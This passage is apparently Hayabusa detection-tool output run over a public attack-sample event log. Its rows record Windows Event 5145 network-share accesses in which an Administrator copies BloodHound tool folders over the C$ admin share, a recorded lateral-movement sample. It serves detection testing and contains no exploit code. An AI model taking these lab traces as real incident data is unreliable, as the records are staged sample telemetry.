10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 
